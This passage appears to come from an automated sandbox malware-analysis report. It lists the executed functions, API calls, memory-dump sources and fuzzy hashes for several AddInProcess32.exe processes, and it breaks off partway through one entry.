Opcode ID: e08ab1a156e771e615fc9750041409f78fb600849f8c9f22adb0a389096b429b
Instruction ID: 3af15da2e2e1266efa3c5add7278dd1246b2e91182be26c5bc37227ed4cf0549
Opcode Fuzzy Hash: e08ab1a156e771e615fc9750041409f78fb600849f8c9f22adb0a389096b429b
Instruction Fuzzy Hash: B2212871500200DFDB05DF54D9C0B26BFA5FB98318F208569ED094B29AC33AD856C6A1

Function 0090D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1924422977.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_90d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 6ea7c5bb68e604d2ccf6b1569128b8c85f27708358b4b1d995f48dd6ba3a4384
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: EB11E676504240CFDB16CF54D9C4B16BF72FB94328F24C6A9ED090B25AC33AD85ACBA1

Analysis Process: AddInProcess32.exePID: 7768, Parent PID: 7540COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	44
Total number of Limit Nodes:	6

Executed Functions

Function 025B7AA8 Relevance: 6.1, APIs: 4, Instructions: 140
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 025B7B4E
GetCurrentThread.KERNEL32 ref: 025B7B8B
GetCurrentProcess.KERNEL32 ref: 025B7BC8
GetCurrentThreadId.KERNEL32 ref: 025B7C21

Memory Dump Source

Source File: 0000000B.00000002.1926206734.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25b0000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6bd62a1b2d16c76e44d48eff4cfb6cb5a8c165d12b5e28979e92d7af5ba9f05a
Instruction ID: 54b166988c94b7e655a4fdbc88caf2c0a70f64abdb6c4a3449c1ab9cc21d700b
Opcode Fuzzy Hash: 6bd62a1b2d16c76e44d48eff4cfb6cb5a8c165d12b5e28979e92d7af5ba9f05a
Instruction Fuzzy Hash: D45196B09002498FDB15DFA9D548BDEBFF1FF88314F2084A9D048A7261DB349988CF69

Function 025B7AD0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 025B7B4E
GetCurrentThread.KERNEL32 ref: 025B7B8B
GetCurrentProcess.KERNEL32 ref: 025B7BC8
GetCurrentThreadId.KERNEL32 ref: 025B7C21

Memory Dump Source

Source File: 0000000B.00000002.1926206734.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25b0000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9ec3f1c6b22ace89169817acea6aa4e0d105ccc4fe24603a29f4d8d4ff57cde3
Instruction ID: bfbb6c9d88d484bd29c4c45a3feed67f00108d004bb6c54e2838354872394374
Opcode Fuzzy Hash: 9ec3f1c6b22ace89169817acea6aa4e0d105ccc4fe24603a29f4d8d4ff57cde3
Instruction Fuzzy Hash: E65124B49002498FDB24DFA9D548BDEBBF1BF88314F208469E059A7360D7749984CF69

Function 025B1F0C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 025B33F1

Memory Dump Source

Source File: 0000000B.00000002.1926206734.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25b0000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9a674478bec629d50dd6b994ec6644fd111995cfd95c8b88d7d15549033480a8
Instruction ID: ba270fb949fc8c5aac45e8168fd790ec41810d2efd4653f4c487783651a7d7fb
Opcode Fuzzy Hash: 9a674478bec629d50dd6b994ec6644fd111995cfd95c8b88d7d15549033480a8
Instruction Fuzzy Hash: 9241FFB0C00619DFDB25CFA9C944BDEBBB5BF48304F2080AAD408BB251DBB56949CF90

Function 025B3337 Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 025B33F1

Memory Dump Source

Source File: 0000000B.00000002.1926206734.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25b0000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 501bc93d93482dc2bb33b14733961703960998d948b8cba3acc0440bbd9ec932
Instruction ID: f30deb12833d7711a97b56e5e2749cc67ba931ea94d99876ece95e93d9b1e8a7
Opcode Fuzzy Hash: 501bc93d93482dc2bb33b14733961703960998d948b8cba3acc0440bbd9ec932
Instruction Fuzzy Hash: 0E410FB0C00619DFDB25CFA9C844BDEFBB1BF49304F2080AAD408AB251DB75694ACF90

Function 025B8118 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025B81A7

Memory Dump Source

Source File: 0000000B.00000002.1926206734.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25b0000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d3d8bbe1c8f62126eb22b354598304be7acbbd4ee0231bd297ec5fe03a2bbdb1
Instruction ID: b27620911e95b1feec60e305fbbd1ffc79d08a78a2b8fabafa0d0027d7dcb386
Opcode Fuzzy Hash: d3d8bbe1c8f62126eb22b354598304be7acbbd4ee0231bd297ec5fe03a2bbdb1
Instruction Fuzzy Hash: 8021E5B5D002199FDB10CF9AD984ADEBFF8FB48320F14842AE914A3350D374A944CFA5

Function 025B8120 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025B81A7

Memory Dump Source

Source File: 0000000B.00000002.1926206734.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25b0000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 71acb0219297c0d81c44b4298ac3f115987534dc6040361b3b6c3b846d8e1091
Instruction ID: e1726df43d6dc989e1e3fbb784616eb55096bf7b46b5c401c1b55b5717a6d8f8
Opcode Fuzzy Hash: 71acb0219297c0d81c44b4298ac3f115987534dc6040361b3b6c3b846d8e1091
Instruction Fuzzy Hash: 4621E3B59002189FDB10CF9AD984ADEBFF8FB48320F14841AE914A3310C374A940CFA4

Function 025B8010 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 025B8B9D

Memory Dump Source

Source File: 0000000B.00000002.1926206734.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25b0000_AddInProcess32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 51c95f45cd288ceb69e421e69f7a5bece40fe01034ff2e6c218906a31d25255c
Instruction ID: 3fc950d27df15b48ae95c243dbedace3879011518819db91906b3a8c05ee73ad
Opcode Fuzzy Hash: 51c95f45cd288ceb69e421e69f7a5bece40fe01034ff2e6c218906a31d25255c
Instruction Fuzzy Hash: 8E1103B59002488FCB20DFAAD549BDEFBF8FB48324F248469D518A7310C375A944CFA5

Function 025B8B40 Relevance: 1.5, APIs: 1, Instructions: 44
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 025B8B9D

Memory Dump Source

Source File: 0000000B.00000002.1926206734.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25b0000_AddInProcess32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: b2c239c0b824ee81e515ebf104fedadf68620815d1356268a8b7d0a262c177c8
Instruction ID: 34000c86bfa76087124465bf32eabe976f481b028ca199191ce278983adbcc76
Opcode Fuzzy Hash: b2c239c0b824ee81e515ebf104fedadf68620815d1356268a8b7d0a262c177c8
Instruction Fuzzy Hash: C71145B5900219CFCB10DFA9D5857CEFBF5FB48324F208859C518A3250C374A544CFA5

Function 025B9FB1 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 025BA010

Memory Dump Source

Source File: 0000000B.00000002.1926206734.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25b0000_AddInProcess32.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1145e2abdaa1f251e14d676cb7e1f4655261db141d3200d096442d4c34bd247d
Instruction ID: d93204049e015105094fc6f2f7976861d90d968b246356bdd534b3f19296ed0b
Opcode Fuzzy Hash: 1145e2abdaa1f251e14d676cb7e1f4655261db141d3200d096442d4c34bd247d
Instruction Fuzzy Hash: 0E1125B59003498FCB20DF9AD544BDEBFF4EB48320F10842AD558A7250D778A544CFA5

Function 025B9FB8 Relevance: 1.3, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 025BA010

Memory Dump Source

Source File: 0000000B.00000002.1926206734.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25b0000_AddInProcess32.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: f79307576a6e11ccf8987344b16352af20165330a608c3c45ec935687b6f8e0d
Instruction ID: fb06410fd58c9c9911516807aafe06e74d3f3a970e6f15e001a1df80b4ca2753
Opcode Fuzzy Hash: f79307576a6e11ccf8987344b16352af20165330a608c3c45ec935687b6f8e0d
Instruction Fuzzy Hash: 2511F2B58003498FCB20DF9AD545BEEBBF4EB48320F20846AD558A7250D779A984CFA5

Analysis Process: AddInProcess32.exePID: 7788, Parent PID: 7540COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	35
Total number of Limit Nodes:	4

Executed Functions

Function 026F7AA8 Relevance: 6.1, APIs: 4, Instructions: 144
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 026F7B4E
GetCurrentThread.KERNEL32 ref: 026F7B8B
GetCurrentProcess.KERNEL32 ref: 026F7BC8
GetCurrentThreadId.KERNEL32 ref: 026F7C21

Memory Dump Source

Source File: 0000000C.00000002.1927367810.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_26f0000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c0ea97bd59ea9d673d09e706132644b84d08629bbd342a3584ee482021d0501c
Instruction ID: d7b79380f8425ca35d25f3ee46eaf4c1bbe4579594b95bdf6514b73d322d1e55
Opcode Fuzzy Hash: c0ea97bd59ea9d673d09e706132644b84d08629bbd342a3584ee482021d0501c
Instruction Fuzzy Hash: 945197B09013488FEB45DFA9D548BDEBBF1EF89304F208099D058A7361D734A984CF65

Function 026F7AD0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 026F7B4E
GetCurrentThread.KERNEL32 ref: 026F7B8B
GetCurrentProcess.KERNEL32 ref: 026F7BC8
GetCurrentThreadId.KERNEL32 ref: 026F7C21

Memory Dump Source

Source File: 0000000C.00000002.1927367810.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_26f0000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d4ae21822b78597ade50ae0f20ba43cf34e18e986132c1a4e13f168cc6327380
Instruction ID: 6e12e6906038594520c24162f002e2c0e789d0ebb6e8787711582d99c2cc01d4
Opcode Fuzzy Hash: d4ae21822b78597ade50ae0f20ba43cf34e18e986132c1a4e13f168cc6327380
Instruction Fuzzy Hash: B45166B4900209CFEB45DFA9D548B9EFBF1EF88304F208459E159A7360D734A984CF65

Function 026F3336 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 026F33F1

Memory Dump Source

Source File: 0000000C.00000002.1927367810.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_26f0000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 34e6da26d09d747e9b160e96d5646efa77918023e99146266dc945ab681b76e7
Instruction ID: 3d754f6bbac4f0fc29b731cb1760f3a108790d09c490286ff9c291985bf200fa
Opcode Fuzzy Hash: 34e6da26d09d747e9b160e96d5646efa77918023e99146266dc945ab681b76e7
Instruction Fuzzy Hash: 294102B0C00759CFDB24DFA9C8447DEBBB5BF49304F2480AAD508AB251DB75694ACF90

Function 026F1F0C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 026F33F1

Memory Dump Source

Source File: 0000000C.00000002.1927367810.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_26f0000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d5e6335321c52ac665d9901c4f122a005525f56ff34634288c892acc98fcd9f4
Instruction ID: c9bfcb50d1f6adfc8addb718d9afa60061d0015c3d2f17e1ca86246fb894756c
Opcode Fuzzy Hash: d5e6335321c52ac665d9901c4f122a005525f56ff34634288c892acc98fcd9f4
Instruction Fuzzy Hash: AC41E2B0C0075DCBDB24DFA9C844B9EBBB5BF89304F2480AAD508AB355DB756949CF90

Function 026F8118 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 026F81A7

Memory Dump Source

Source File: 0000000C.00000002.1927367810.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_26f0000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d1eba81569809bf93cd2bc8c8299d79d575e3c5d1bf3d484675dbdbeac358c68
Instruction ID: 610e844d2bc0fafbe64f8090a5ac4a0907147932294fcd8fadefd89defd7efd9
Opcode Fuzzy Hash: d1eba81569809bf93cd2bc8c8299d79d575e3c5d1bf3d484675dbdbeac358c68
Instruction Fuzzy Hash: 4421E4B5D002199FDB10CFAAD984ADEFFF9EB48320F14815AE958A3350D374A944CFA5

Function 026F8120 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 026F81A7

Memory Dump Source

Source File: 0000000C.00000002.1927367810.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_26f0000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 48c9e441966c56f740bd5988f4e7f283ae69b5a32f35a59d4c37a59ee88f7fb3
Instruction ID: 7591c7cf0186d46c1d885872563fa305ddeca5ada44076156f687cf951e55ef9
Opcode Fuzzy Hash: 48c9e441966c56f740bd5988f4e7f283ae69b5a32f35a59d4c37a59ee88f7fb3
Instruction Fuzzy Hash: 8221E2B59002199FDB10CFAAD984ADEBBF8EB48320F14805AE958A3350C374A944CFA5

Function 026F8B40 Relevance: 1.5, APIs: 1, Instructions: 48
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 026F8B9D

Memory Dump Source

Source File: 0000000C.00000002.1927367810.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_26f0000_AddInProcess32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 5d5cce68691b2f74034875c7b7bc1911153f2d98ffb1a7b02fc333be9eb522a6
Instruction ID: 53dd09cf77308e81c9d4004dda7e2443fe9e644cecbdf93c4fa8de377db2492c
Opcode Fuzzy Hash: 5d5cce68691b2f74034875c7b7bc1911153f2d98ffb1a7b02fc333be9eb522a6
Instruction Fuzzy Hash: 6D1115B59003498FCB10DFAAD585BCEFBF4EB48324F208859D558A7350C375A544CFA5

Function 026F8010 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 026F8B9D

Memory Dump Source

Source File: 0000000C.00000002.1927367810.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_26f0000_AddInProcess32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: bbf260f2675fb4eb6896ad9eb5deeef004d0e05b2d9ff6233538e06271809b78
Instruction ID: b071f7401db728461801dbca197852089aeaae3923992c66272dd36870f5f600
Opcode Fuzzy Hash: bbf260f2675fb4eb6896ad9eb5deeef004d0e05b2d9ff6233538e06271809b78
Instruction Fuzzy Hash: 7A1112B59003488FDB60DF9AD549BDEFBF8EB48324F208499E658A7350C374A944CFA5

Function 026F9FB1 Relevance: 1.3, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 026FA010

Memory Dump Source

Source File: 0000000C.00000002.1927367810.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_26f0000_AddInProcess32.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 3ea08d7f22870aee3d98b4e0190b7293f69310b9dcb49ba7ae8cda8391bcf190
Instruction ID: cc5a3246559e2b08ba6abdf0c455dd957190df48a24ebe21e3d63d961760755b
Opcode Fuzzy Hash: 3ea08d7f22870aee3d98b4e0190b7293f69310b9dcb49ba7ae8cda8391bcf190
Instruction Fuzzy Hash: 3C1148B1800349CFCB20DF99D545BDEBBF4EB48324F208429D968A7740C379A945CFA5

Function 026F9FB8 Relevance: 1.3, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 026FA010

Memory Dump Source

Source File: 0000000C.00000002.1927367810.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_26f0000_AddInProcess32.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7bead69625923496296393c690a8000f989294116069cb299e83c30ea6cdafce
Instruction ID: 8c1f2e4ad749777915aee68efceba684466b5cd3f6f050f07356747b0c37e71c
Opcode Fuzzy Hash: 7bead69625923496296393c690a8000f989294116069cb299e83c30ea6cdafce
Instruction Fuzzy Hash: DC1145B1800349CFCB20DF9AC544BDEBBF4EB48324F10842AD558A7340C378A944CFA5

Function 00CFD4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1926181921.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cfd000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d150e3ae68c7ba6f185981cd54c8fe576adfffb4f8d319cfae7120fb2e2d528
Instruction ID: 59b540633965bf57f693b9a2836eae41d073de195c0f52a3a409e71909878d6b
Opcode Fuzzy Hash: 0d150e3ae68c7ba6f185981cd54c8fe576adfffb4f8d319cfae7120fb2e2d528
Instruction Fuzzy Hash: CC2125B1500208DFCB45DF14D9C4B26BFA6FB98318F208169EA0A4B256C336D956CBA3

Function 00CFD4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1926181921.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_cfd000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: d27060f98a0acb24f60e5d7f44bb34dc89f83ee9936edf75943b9093d360b34f
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 1711D3B6504244CFCB16CF14D5C4B26BF72FB94318F24C6A9D90A0B256C33AD95ACBA2

Analysis Process: AddInProcess32.exePID: 7804, Parent PID: 7540COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	44
Total number of Limit Nodes:	6

Executed Functions

Function 00B57AA8 Relevance: 6.1, APIs: 4, Instructions: 138
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00B57B4E
GetCurrentThread.KERNEL32 ref: 00B57B8B
GetCurrentProcess.KERNEL32 ref: 00B57BC8
GetCurrentThreadId.KERNEL32 ref: 00B57C21

Memory Dump Source

Source File: 0000000D.00000002.1925789878.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b50000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4731628319e08cabb6bf3aac982abbb6947b5874210332a5cd0a51c4b5455644
Instruction ID: 7ea5d093d5b3e2559133e5bbdcab5368104517d0d5651b551b4a60ccbbe50173
Opcode Fuzzy Hash: 4731628319e08cabb6bf3aac982abbb6947b5874210332a5cd0a51c4b5455644
Instruction Fuzzy Hash: 555166B0A05249CFDB04DFA9D548BDEBBF1EF48304F208499D459AB260DB749988CF69

Function 00B57AD0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00B57B4E
GetCurrentThread.KERNEL32 ref: 00B57B8B
GetCurrentProcess.KERNEL32 ref: 00B57BC8
GetCurrentThreadId.KERNEL32 ref: 00B57C21

Memory Dump Source

Source File: 0000000D.00000002.1925789878.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b50000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 49565d967cb18efaf5d822975670580c58f23ba3ba0ec8f5ab475299f4ce4600
Instruction ID: 730e870a2eead46db23c87f3bfbc6a8fcc91ba7ac1409d585a19638fa6453f6e
Opcode Fuzzy Hash: 49565d967cb18efaf5d822975670580c58f23ba3ba0ec8f5ab475299f4ce4600
Instruction Fuzzy Hash: EF5156B0E01209CFDB04DFA9D548BDEBBF5EB48304F208499E459A7360DB74A948CF69

Function 00B53336 Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B533F1

Memory Dump Source

Source File: 0000000D.00000002.1925789878.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b50000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 509cefa758d94efae81f7680bfadc8f5ff5f1a16ea1cbe09657d8664ed5bfc7b
Instruction ID: 6529b5b09f7b6377fc9179540c26331b01dab1e0f9f3a6559c0cbbd1ef2f4018
Opcode Fuzzy Hash: 509cefa758d94efae81f7680bfadc8f5ff5f1a16ea1cbe09657d8664ed5bfc7b
Instruction Fuzzy Hash: E941E0B1C00619CFDB24CFA9C884BDDBBF5BF48714F2480AAD409AB251DB755A4ACF90

Function 00B51F0C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B533F1

Memory Dump Source

Source File: 0000000D.00000002.1925789878.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b50000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b90d1e6d59ef319d8bbef387556bde80a317e95f5b685cef60e11442d524af9c
Instruction ID: 54b3442f5b88f9d6eb836d1d6112b19ff5cbb0a213bb11cf2b58387d5069cb6f
Opcode Fuzzy Hash: b90d1e6d59ef319d8bbef387556bde80a317e95f5b685cef60e11442d524af9c
Instruction Fuzzy Hash: 6F41D0B0C00619CBDB24DFA9C844B9EBBF5BF49704F2480AAD409AB255DBB56949CF90

Function 00B58118 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B581A7

Memory Dump Source

Source File: 0000000D.00000002.1925789878.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b50000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 800e6449068359a6ebd4d2ae84540314e966961c1e04bbddaa9a41ae21207808
Instruction ID: 401f3f1822ce1b859ff0a5c77f53fc2b6bb8b1b08da8db713e14b9c358c3b5f3
Opcode Fuzzy Hash: 800e6449068359a6ebd4d2ae84540314e966961c1e04bbddaa9a41ae21207808
Instruction Fuzzy Hash: EB21E5B5D002189FDB10CF9AD984ADEBBF4EB48320F14845AE914B3250D374A945CFA4

Function 00B58120 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B581A7

Memory Dump Source

Source File: 0000000D.00000002.1925789878.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b50000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1cbf9fa8dc34fba96bb5d7288b6d9da7355511637f852a7ec71a02d61823b5d1
Instruction ID: 9619917e073bedc37ea0cd8c4130e504c42ef51ef3a384cefdfd8022d8ec4866
Opcode Fuzzy Hash: 1cbf9fa8dc34fba96bb5d7288b6d9da7355511637f852a7ec71a02d61823b5d1
Instruction Fuzzy Hash: 1821C4B5900258DFDB10CF9AD984ADEFBF4EB48310F14845AE954B7350D378A944CFA5

Function 00B58010 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 00B58B9D

Memory Dump Source

Source File: 0000000D.00000002.1925789878.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b50000_AddInProcess32.jbxd

Similarity

API ID: Initialize
String ID:
